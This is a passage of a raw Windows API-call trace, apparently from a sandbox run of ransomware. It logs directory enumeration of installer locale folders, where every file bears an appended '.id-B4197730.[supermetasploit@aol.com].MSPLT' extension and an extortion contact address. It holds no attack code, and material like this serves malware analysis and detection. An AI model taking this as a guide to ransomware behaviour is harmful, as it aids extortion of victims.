ftLastWriteTime.dwLowDateTime=0x5a219534, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x12eb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.844] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b0d9ba0, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b0d9ba0, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b126136, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.845] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b0d9ba0, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b0d9ba0, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b126136, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.845] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0283.846] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.846] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7e9034, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1035", cAlternateFileName="")) returned 1 [0283.846] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.846] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7e9034, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ca8 [0283.847] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7e9034, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.847] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a7e9034, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ab09f52, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf64, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.848] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a7e9034, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a835312, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x12dd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.848] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b126136, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b126136, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b14c407, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.848] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b126136, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b126136, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b14c407, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.848] FindClose (in: hFindFile=0x3947ca8 | out: hFindFile=0x3947ca8) returned 1 [0283.850] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.850] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7506f5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7506f5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1036", cAlternateFileName="")) returned 1 [0283.850] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.850] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7506f5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7506f5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948228 [0283.852] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7506f5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7506f5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.852] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a66b8c8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a66b8c8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6e59a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xeb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.852] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a6e59a8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a6e59a8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7506f5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x14516, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.852] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ad6c5da, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ad6c5da, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5adb8b53, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.852] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ad6c5da, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ad6c5da, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5adb8b53, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.852] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0283.853] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.853] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5ab301eb, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ab301eb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1037", cAlternateFileName="")) returned 1 [0283.853] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.854] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5ab301eb, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ab301eb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ca8 [0283.855] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5ab301eb, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ab301eb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.855] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a709082, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a709082, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a776a46, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1bb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.855] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b3fc3a2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b3fc3a2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b50939c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x11a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.855] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b420fb4, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b52c0bb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4258, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.855] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b420fb4, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b52c0bb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4258, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.855] FindClose (in: hFindFile=0x3947ca8 | out: hFindFile=0x3947ca8) returned 1 [0283.857] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.857] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b02bdea, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b02bdea, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1038", cAlternateFileName="")) returned 1 [0283.857] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.857] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b02bdea, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b02bdea, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0283.858] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b02bdea, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b02bdea, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.858] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ab09f52, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ab09f52, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b02bdea, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1184, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.858] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ad6c5da, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ad6c5da, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ae04fd5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x152a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.859] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8bf9ef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8bf9ef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b9d5b1f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.859] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8bf9ef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8bf9ef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b9d5b1f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.859] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0283.860] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.860] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b06769e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1040", cAlternateFileName="")) returned 1 [0283.860] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.860] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b06769e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948028 [0283.861] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b06769e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b06769e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.862] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ad6c5da, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ad6c5da, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5adb8b53, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf24, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.862] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ade644c, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ade644c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b0414c0, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x139b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.862] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e98c2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8e98c2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba2fb18, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.862] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e98c2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8e98c2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba2fb18, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.862] FindClose (in: hFindFile=0x3948028 | out: hFindFile=0x3948028) returned 1 [0283.863] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.863] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b0b3ac1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b0b3ac1, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1041", cAlternateFileName="")) returned 1 [0283.864] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.864] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b0b3ac1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b0b3ac1, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f68 [0283.865] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b0b3ac1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b0b3ac1, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.865] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ae04fd5, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ae04fd5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b06769e, 